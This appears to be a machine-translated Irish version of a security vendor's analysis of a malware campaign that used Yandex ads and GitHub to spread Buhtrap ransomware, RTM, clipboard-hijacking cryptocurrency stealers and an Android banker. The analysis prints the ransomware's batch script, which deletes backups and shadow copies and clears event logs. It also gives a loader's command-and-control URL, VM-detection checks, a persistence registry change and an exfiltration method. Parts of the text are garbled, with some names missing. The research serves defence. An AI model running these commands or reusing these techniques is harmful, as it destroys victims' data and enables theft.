Chun díriú ar chuntasóirí i gcibear-ionsaí, is féidir leat úsáid a bhaint as doiciméid oibre a gcuardaíonn siad orthu ar líne. Is é seo go garbh atá á dhéanamh ag cibearghrúpa le míonna beaga anuas, ag dáileadh cúldoirse aitheanta. и , chomh maith le cripteoirí agus bogearraí chun cryptocurrencies a ghoid. Tá formhór na spriocanna lonnaithe sa Rúis. Rinneadh an t-ionsaí trí fhógraíocht mhailíseach a chur ar Yandex.Direct. Treoraíodh íospartaigh ionchasacha chuig suíomh Gréasáin áit ar iarradh orthu comhad mailíseach a bhí faoi cheilt mar theimpléad doiciméid a íoslódáil. Bhain Yandex an fhógraíocht mhailíseach tar éis ár rabhaidh.
Tá cód foinse Buhtrap sceitheadh ar líne san am atá caite ionas gur féidir le duine ar bith é a úsáid. Níl aon fhaisnéis againn maidir le hinfhaighteacht cód RTM.
Sa phost seo inseoimid duit conas a dháileadh na hionsaitheoirí malware ag baint úsáide as Yandex.Direct agus é a óstáil ar GitHub. Críochnóidh an post le hanailís theicniúil ar an malware.
Tá Buhtrap agus RTM ar ais i mbun gnó
Meicníocht scaipeadh agus íospartaigh
Tá meicníocht iolraithe comónta ag na hualaí pála éagsúla a sheachadtar chuig íospartaigh. Cuireadh gach comhad mailíseach a chruthaigh na hionsaitheoirí i dhá stór GitHub éagsúla.
Go hiondúil, bhí comhad mailíseach amháin in-íoslódáilte sa stór, rud a athraíonn go minic. Ós rud é go gceadaíonn GitHub duit stair na n-athruithe ar stór a fheiceáil, is féidir linn a fheiceáil cad a dáileadh malware le linn tréimhse áirithe. Chun a chur ina luí ar an íospartach an comhad mailíseach a íoslódáil, baineadh úsáid as an suíomh Gréasáin blanki-shabloni24[.]ru, a thaispeántar san fhigiúr thuas.
Leanann dearadh an tsuímh agus ainmneacha na gcomhad mailíseach coincheap amháin - foirmeacha, teimpléid, conarthaí, samplaí, etc. Ós rud é gur úsáideadh bogearraí Buhtrap agus RTM cheana féin in ionsaithe ar chuntasóirí san am atá caite, ghlacamar leis go raibh an straitéis mar an gcéanna san fheachtas nua. Is í an t-aon cheist ná conas a tháinig an t-íospartach ar shuíomh Gréasáin na n-ionsaitheoirí.
Ionfhabhtú
Mheall fógraíocht mhailíseach ar a laghad roinnt íospartaigh ionchasacha a chríochnaigh ar an suíomh seo. Seo thíos sampla URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Mar a fheiceann tú ón nasc, cuireadh an bhratach ar an bhfóram cuntasaíochta dlisteanach bb.f2[.]kz. Tá sé tábhachtach a thabhairt faoi deara go raibh na meirgí le feiceáil ar shuímh éagsúla, go raibh an t-aitheantas feachtais chéanna (blanki_rsya) acu go léir, agus bhain an chuid is mó díobh le seirbhísí cuntasaíochta nó cúnaimh dhlíthiúil. Léiríonn an URL gur bhain an t-íospartach ionchasach úsáid as an iarratas “íoslódáil an fhoirm sonraisc,” a thacaíonn lenár hipitéis maidir le hionsaithe spriocdhírithe. Anseo thíos tá na suíomhanna ina raibh na meirgí le feiceáil agus na ceisteanna cuardaigh comhfhreagracha.
- Íoslódáil foirm sonraisc – bb.f2[.]kz
- conradh samplach - Ipopen[.]ru
- sampla gearán iarratais - 77metrov[.]ru
- foirm chomhaontaithe - blank-dogovor-kupli-prodazhi[.]ru
- achainí cúirte samplach - zen.yandex[.]ru
- gearán samplach - yurday[.]ru
- foirmeacha conartha samplacha – Regforum[.]ru
- foirm chonartha – assistentus[.]ru
- comhaontú árasán samplach – napravah[.]com
- samplaí de chonarthaí dlíthiúla - avito[.]ru
Seans go bhfuil an suíomh blanki-shabloni24[.]ru cumraithe chun pas a fháil i measúnú amhairc simplí. Go hiondúil, ní cosúil go bhfuil droch-rud ar fhógra a dhíríonn ar shuíomh gairmiúil le nasc chuig GitHub. Ina theannta sin, níor uaslódáil na hionsaitheoirí comhaid mhailíseacha chuig an stór ach ar feadh tréimhse teoranta, is dócha le linn an fheachtais. An chuid is mó den am, bhí cartlann zip folamh nó comhad EXE bán i stór GitHub. Mar sin, d'fhéadfadh ionsaitheoirí fógraíocht a dháileadh trí Yandex.Direct ar shuíomhanna arbh é is dóichí gur thug cuntasóirí cuairt orthu a tháinig mar fhreagra ar cheisteanna cuardaigh sonracha.
Ansin, déanaimis féachaint ar na hualaí pá éagsúla a dháiltear ar an mbealach seo.
Anailís Pálasta
Croineolaíocht an dáilte
Thosaigh an feachtas mailíseach ag deireadh mhí Dheireadh Fómhair 2018 agus tá sé gníomhach agus é seo á scríobh. Ós rud é go raibh an stór iomlán ar fáil go poiblí ar GitHub, chuireamar amlíne cruinn le chéile maidir le dáileadh sé theaghlach malware éagsúla (féach an figiúr thíos). Chuireamar líne leis a thaispeánann cathain a thángthas ar an nasc meirgí, arna thomhas ag teiliméadracht ESET, chun comparáid a dhéanamh le stair git. Mar a fheiceann tú, comhghaolann sé seo go maith le hinfhaighteacht an pálasta ar GitHub. Is féidir an neamhréiteach ag deireadh mhí Feabhra a mhíniú ag an bhfíric nach raibh cuid den stair athraithe againn toisc gur baineadh an stór ó GitHub sula bhféadfaimis é a fháil go hiomlán.
Fíor 1. Croineolaíocht dáileadh malware.
Deimhnithe Sínithe Cóid
Bhain an feachtas úsáid as teastais iolracha. Shínigh níos mó ná teaghlach malware amháin cuid acu, rud a thugann le fios freisin gur bhain samplaí éagsúla leis an bhfeachtas céanna. In ainneoin an eochair phríobháideach a bheith ar fáil, níor shínigh oibreoirí na dénártha go córasach agus níor úsáid siad an eochair do gach sampla. Go déanach i mí Feabhra 2019, thosaigh ionsaitheoirí ag cruthú sínithe neamhbhailí ag baint úsáide as deimhniú faoi úinéireacht Google nach raibh an eochair phríobháideach acu.
Tá na deimhnithe go léir a bhaineann leis an bhfeachtas agus na teaghlaigh malware a shíníonn siad liostaithe sa tábla thíos.
Bhaineamar úsáid freisin as na deimhnithe sínithe cód seo chun naisc a bhunú le teaghlaigh malware eile. I gcás formhór na ndeimhnithe, níor aimsigh muid samplaí nár dáileadh trí stór GitHub. Mar sin féin, baineadh úsáid as an deimhniú TOV “MARIYA” chun malware a bhaineann leis an botnet a shíniú , adware agus mianadóirí. Ní dócha go bhfuil baint ag an malware seo leis an bhfeachtas seo. Is dócha, ceannaíodh an deimhniú ar an darknet.
Win32/Filecoder.Buhtrap
Ba é an chéad chomhpháirt a tharraing ár n-aird ná an Win32/Filecoder.Buhtrap nua-aimsithe. Comhad dénártha Delphi é seo atá pacáistithe uaireanta. Dáileadh go príomha i mí Feabhra go Márta 2019. Feidhmíonn sé mar a oireann do chlár ransomware - cuardaigh sé tiomántáin áitiúla agus fillteáin líonra agus criptíonn sé na comhaid braite. Ní gá nasc Idirlín a chur i gcontúirt toisc nach ndéanann sé teagmháil leis an bhfreastalaí chun eochracha criptithe a sheoladh. Ina áit sin, cuireann sé “comhartha” le deireadh na teachtaireachta fuascailte, agus molann sé ríomhphost nó Bitmessage a úsáid chun teagmháil a dhéanamh le hoibreoirí.
Chun an oiread acmhainní íogaire agus is féidir a chriptiú, ritheann Filecoder.Buhtrap snáithe atá deartha chun eochair-bhogearraí a dhúnadh a bhféadfadh láimhseálaithe comhaid oscailte a bheith acu ina bhfuil faisnéis luachmhar a d'fhéadfadh cur isteach ar chriptiú. Is iad na próisis sprice go príomha ná córais bhainistíochta bunachar sonraí (DBMS). Ina theannta sin, scriosann Filecoder.Buhtrap comhaid logála agus cúltacaí chun sonraí a aisghabháil deacair. Chun seo a dhéanamh, rith an script bhaisc thíos.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Úsáideann Filecoder.Buhtrap seirbhís Logálaí IP dlisteanach ar líne atá deartha chun faisnéis a bhailiú faoi chuairteoirí láithreán gréasáin. Tá sé seo beartaithe chun íospartaigh na hearraí ransom a rianú, arb é an líne ceannais atá freagrach as:
mshta.exe "javascript:document.write('');"
Roghnaítear comhaid le haghaidh criptithe mura dtagann siad le trí liosta eisiaimh. Ar an gcéad dul síos, níl comhaid leis na síntí seo a leanas criptithe: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys agus .bat. Ar an dara dul síos, tá gach comhad a bhfuil teaghráin eolaire sa chonair iomlán ón liosta thíos eisiata.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Ar an tríú dul síos, tá ainmneacha comhaid áirithe eisiata ó chriptiú freisin, ina measc ainm comhaid na teachtaireachta fuascailte. Tá an liosta léirithe thíos. Ar ndóigh, tá na heisceachtaí seo go léir beartaithe chun an meaisín a choinneáil ar siúl, ach gan ach an oiread agus is féidir a ródacmhainneacht.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Scéim criptithe comhad
Nuair a dhéantar é a fhorghníomhú, gineann an malware péire eochair RSA 512-giotán. Ansin déantar an t-easpónant príobháideach (d) agus modulus (n) a chriptiú le heochair phoiblí 2048-giotán atá códaithe go crua (easpónant poiblí agus modulus), zlib-pacáilte, agus bonn64 ionchódaithe. Tá an cód atá freagrach as seo léirithe i bhFíor 2.
Fíor 2. Toradh ar dhí-thiomsú Hex-Rays ar phróiseas giniúna eochair-phéire 512-giotán RSA.
Anseo thíos tá sampla de ghnáth-théacs a bhfuil eochair phríobháideach ginte aige, ar comhartha é a ghabhann leis an teachtaireacht airgead fuascailte.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Tá eochair phoiblí na n-ionsaitheoirí tugtha thíos.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Tá na comhaid criptithe ag baint úsáide as AES-128-CBC le eochair 256-giotán. I gcás gach comhad criptithe, gintear eochair nua agus veicteoir túsaithe nua. Cuirtear an eochairfhaisnéis le deireadh an chomhaid criptithe. Déanaimis breithniú ar fhormáid an chomhaid criptithe.
Tá an ceanntásc seo a leanas ag comhaid criptithe:
Tá sonraí an chomhaid foinse agus luach draíochta VEGA curtha leis criptithe chuig an gcéad 0x5000 bytes. Tá gach faisnéis díchriptithe ceangailte le comhad a bhfuil an struchtúr seo a leanas air:
- Tá marc ar an marcóir méid comhaid a thugann le fios cé acu an bhfuil nó nach bhfuil an comhad níos mó ná 0x5000 beart
— blob eochrach AES = ZlibCompress(RSAEncrypt(eochair AES + IV, eochair phoiblí na heochrach RSA ginte))
- blob eochrach RSA = ZlibCompress(RSAEncrypt (gineadh eochair phríobháideach RSA, eochair phoiblí RSA le cód crua))
Win32/Clipbanker
Is comhpháirt é Win32/ClipBanker a dáileadh go huaineach ó dheireadh mhí Dheireadh Fómhair go dtí tús mhí na Nollag 2018. Is é an ról atá aige ná monatóireacht a dhéanamh ar ábhar an ghearrthaisce, lorgaíonn sé seoltaí sparán cryptocurrency. Tar éis seoladh sprice an sparán a chinneadh, cuireann ClipBanker seoladh a chreidtear gur leis na hoibreoirí é ina ionad. Ní raibh na samplaí a scrúdaíomar i mboscaí ná i bhfostú. Is é an t-aon mheicníocht a úsáidtear chun iompar a cheilt ná criptiú teaghrán. Déantar seoltaí sparán oibreoirí a chriptiú ag baint úsáide as RC4. Is iad na sprioc-cryptocurrencies ná Bitcoin, Bitcoin cash, Dogecoin, Ethereum agus Ripple.
Le linn na tréimhse a raibh an malware ag scaipeadh chuig sparán Bitcoin na n-ionsaitheoirí, cuireadh méid beag chuig VTS, rud a chuireann amhras faoi rath an fheachtais. Ina theannta sin, níl aon fhianaise ann a thabharfadh le tuiscint go raibh baint ar bith ag na hidirbhearta seo le ClipBanker.
Win32/RTM
Dáileadh an chomhpháirt Win32/RTM ar feadh roinnt laethanta go luath i mí an Mhárta 2019. Is baincéir Trojan é RTM atá scríofa i Delphi, atá dírithe ar chianchórais bhaincéireachta. In 2017, d'fhoilsigh taighdeoirí ESET den chlár seo, tá an cur síos fós ábhartha. I mí Eanáir 2019, d'eisigh Palo Alto Networks freisin .
Buhtrap Loader
Le tamall anuas, bhí íoslódálaí ar fáil ar GitHub nach raibh cosúil le huirlisí Buhtrap roimhe seo. Casann sé go https://94.100.18[.]67/RSS.php?<some_id> chun an chéad chéim eile a fháil agus é a luchtú go díreach sa chuimhne. Is féidir linn idirdhealú a dhéanamh ar dhá iompar de chód an dara céim. Sa chéad URL, rith RSS.php backdoor Buhtrap go díreach - tá an backdoor seo an-chosúil leis an gceann atá ar fáil tar éis an cód foinse a sceitheadh.
Suimiúil go leor, feicimid roinnt feachtais le backdoor Buhtrap, agus líomhnaítear go bhfuil siad á reáchtáil ag oibreoirí éagsúla. Sa chás seo, is é an príomh-difríocht ná go bhfuil an backdoor luchtaithe go díreach isteach sa chuimhne agus nach n-úsáideann an scéim is gnách leis an bpróiseas imscaradh DLL a labhair muid faoi . Ina theannta sin, d'athraigh na hoibreoirí an eochair RC4 a úsáidtear chun trácht líonra a chriptiú chuig an bhfreastalaí C&C. I bhformhór na bhfeachtas atá feicthe againn, níor bhac ar oibreoirí an eochair seo a athrú.
Ba é an dara hiompar níos casta ná gur cuireadh an URL RSS.php chuig lódóir eile. Chuir sé roinnt obfuscation i bhfeidhm, mar atógáil an tábla allmhairiú dinimiciúil. Is é cuspóir an tosaitheora teagmháil a dhéanamh leis an bhfreastalaí C&C [.] com/api/F27F84EDA4D13B15/2, seol na logaí agus fan ar fhreagra. Próiseálann sé an freagra mar bhlob, lódálann sé isteach sa chuimhne é agus cuireann sé i gcrích é. Ba é an pálasta a chonaiceamar agus an lódóir seo á fhorghníomhú ná backdoor Buhtrap céanna, ach d'fhéadfadh go mbeadh comhpháirteanna eile ann.
Android/Spy.Baincéir
Suimiúil go leor, fuarthas comhpháirt do Android freisin i stór GitHub. Ní raibh sé sa phríomhbhrainse ach ar feadh lá amháin - 1 Samhain, 2018. Seachas a bheith curtha ar GitHub, ní aimsíonn teiliméadracht ESET aon fhianaise go bhfuil an malware seo á dháileadh.
Óstáladh an chomhpháirt mar Phacáiste Feidhmchláir Android (APK). Tá sé an-obfuscated. Tá an t-iompar mailíseach i bhfolach i JAR criptithe atá suite san APK. Tá sé criptithe le RC4 ag baint úsáide as an eochair seo:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Úsáidtear an eochair agus an algartam céanna chun teaghráin a chriptiú. Tá JAR suite i APK_ROOT + image/files. Cuimsíonn an chéad 4 beart den chomhad fad an JAR criptithe, a thosaíonn díreach tar éis an réimse faid.
Tar éis dúinn an comhad a dhíchriptiú, fuaireamar amach gurbh é Anubis a bhí ann - roimhe seo baincéir le haghaidh Android. Tá na gnéithe seo a leanas ag an malware:
- Taifeadadh micreafón
- screenshots a ghlacadh
- ag fáil comhordanáidí GPS
- keylogger
- criptiú sonraí gléas agus éileamh fuascailte
- turscar
Díol spéise é gur bhain an baincéir úsáid as Twitter mar chainéal cúltaca cumarsáide chun freastalaí C&C eile a fháil. D'úsáid an sampla a rinneamar anailís ar an gcuntas @JonesTrader, ach ag am na hanailíse bhí sé bactha cheana féin.
Tá liosta de na hiarratais sprice ar an ngléas Android sa baincéir. Tá sé níos faide ná an liosta a fuarthas i staidéar Sophos. Áirítear ar an liosta go leor feidhmchlár baincéireachta, cláir siopadóireachta ar líne ar nós Amazon agus eBay, agus seirbhísí cryptocurrency.
MSIL/ClipBanker.IH
Ba í an chomhpháirt dheireanach a dáileadh mar chuid den fheachtas seo an inrite .NET Windows, a tháinig i mí an Mhárta 2019. Rinneadh an chuid is mó de na leaganacha a ndearnadh staidéar orthu a phacáistiú le ConfuserEx v1.0.0. Cosúil le ClipBanker, úsáideann an chomhpháirt seo an gearrthaisce. Is é a sprioc raon leathan cryptocurrencies, chomh maith le tairiscintí ar Gaile. Ina theannta sin, úsáideann sé an tseirbhís Logger IP chun an eochair phríobháideach WIF Bitcoin a ghoid.
Meicníochtaí Cosanta
Chomh maith leis na buntáistí a sholáthraíonn ConfuserEx maidir le dífhabhtú, dumpáil agus cur isteach a chosc, cuimsíonn an chomhpháirt an cumas táirgí antivirus agus meaisíní fíorúla a bhrath.
Chun a fhíorú go ritheann sé i meaisín fíorúil, úsáideann an malware líne ordaithe ionsuite Windows WMI (WMIC) chun faisnéis BIOS a iarraidh, eadhon:
wmic bios
Ansin parsálann an clár an t-aschur ordaithe agus lorgaíonn sé eochairfhocail: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Chun táirgí frithvíreas a bhrath, seolann malware iarratas Windows Management Instrumentation (WMI) chuig Windows Security Center ag baint úsáide as ManagementObjectSearcher API mar a thaispeántar thíos. Tar éis díchódaithe ó base64 tá cuma mar seo ar an nglao:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Fíor 3. Próiseas chun táirgí frithvíreas a aithint.
Ina theannta sin, seiceálann an malware cibé acu , uirlis chun cosaint a dhéanamh ar ionsaithe gearrthaisce agus, má tá sé ag rith, cuireann sé na snáitheanna go léir ar fionraí sa phróiseas sin, rud a dhíchumasaítear an chosaint.
Marthanacht
Déanann an leagan de malware a ndearna muid staidéar air é féin a chóipeáil isteach %APPDATA%googleupdater.exe agus socraíonn sé an tréith “i bhfolach” don eolaire google. Ansin athraíonn sí an luach SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell sa chlár Windows agus cuireann sé an cosán updater.exe. Ar an mbealach seo, déanfar an malware a fhorghníomhú gach uair a logálann an t-úsáideoir isteach.
Iompar mailíseach
Cosúil le ClipBanker, déanann an malware monatóireacht ar inneachar an ghearrthaisce agus lorgaíonn sé seoltaí sparán cryptocurrency, agus nuair a aimsítear é, cuireann sé ceann de sheoltaí an oibreora ina ionad. Anseo thíos tá liosta de na seoltaí sprice atá bunaithe ar an méid atá le fáil sa chód.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
I gcás gach cineál seolta tá slonn rialta comhfhreagrach. Úsáidtear an luach STEAM_URL chun ionsaí a dhéanamh ar an gcóras Gaile, mar atá le feiceáil ón slonn rialta a úsáidtear chun sainmhíniú sa mhaolán:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Cainéal sceite
Chomh maith le seoltaí a athsholáthar sa mhaolán, díríonn an malware ar eochracha príobháideacha WIF sparán Bitcoin, Bitcoin Core agus Electrum. Úsáideann an clár plogger.org mar chainéal sceite chun an eochair phríobháideach WIF a fháil. Chun seo a dhéanamh, cuireann oibreoirí sonraí eochair phríobháideacha leis an gceanntásc HTTP User-Agent, mar a thaispeántar thíos.
Fíor 4. Consól Logger IP le sonraí aschuir.
Níor úsáid oibreoirí iplogger.org chun sparán a dhí-scagadh. Is dócha gur bhain siad úsáid as modh difriúil mar gheall ar an teorainn de 255 carachtar sa pháirc User-Agenttaispeáint sa chomhéadan gréasáin Logger IP. Sna samplaí a ndearnamar staidéar orthu, bhí an freastalaí aschuir eile stóráilte san athróg timpeallachta DiscordWebHook. Is ionadh é nach bhfuil an athróg timpeallachta seo sannta áit ar bith sa chód. Tugann sé seo le tuiscint go bhfuil an malware fós á fhorbairt agus go bhfuil an athróg sannta do mheaisín tástála an oibreora.
Tá comhartha eile ann go bhfuil an clár á fhorbairt. Cuimsíonn an comhad dénártha dhá URL iplogger.org, agus ceistítear an dá cheann nuair a dhéantar sonraí a eas-scagadh. In iarratas chuig ceann de na URLanna seo, cuirtear “DEV /” roimh an luach sa réimse Referer. Fuaireamar leagan nach raibh pacáistithe le ConfuserEx freisin, is é DevFeedbackUrl an t-ainm atá ar fhaighteoir an URL seo. Bunaithe ar an ainm athróg timpeallachta, creidimid go bhfuil na hoibreoirí ag pleanáil úsáid a bhaint as an tseirbhís dlisteanach Discord agus a chóras idirghabhála gréasáin chun sparán cryptocurrency a ghoid.
Conclúid
Is sampla é an feachtas seo d’úsáid seirbhísí fógraíochta dlisteanacha i gcibearionsaithe. Díríonn an scéim ar eagraíochtaí na Rúise, ach ní bheadh iontas orainn ionsaí den sórt sin a fheiceáil ag baint úsáide as seirbhísí neamh-Rúise. Chun comhréiteach a sheachaint, ní mór d’úsáideoirí a bheith muiníneach as clú fhoinse na mbogearraí a íoslódálann siad.
Tá liosta iomlán táscairí comhréitigh agus tréithe MITER ATT&CK ar fáil ag .
Foinse: will.com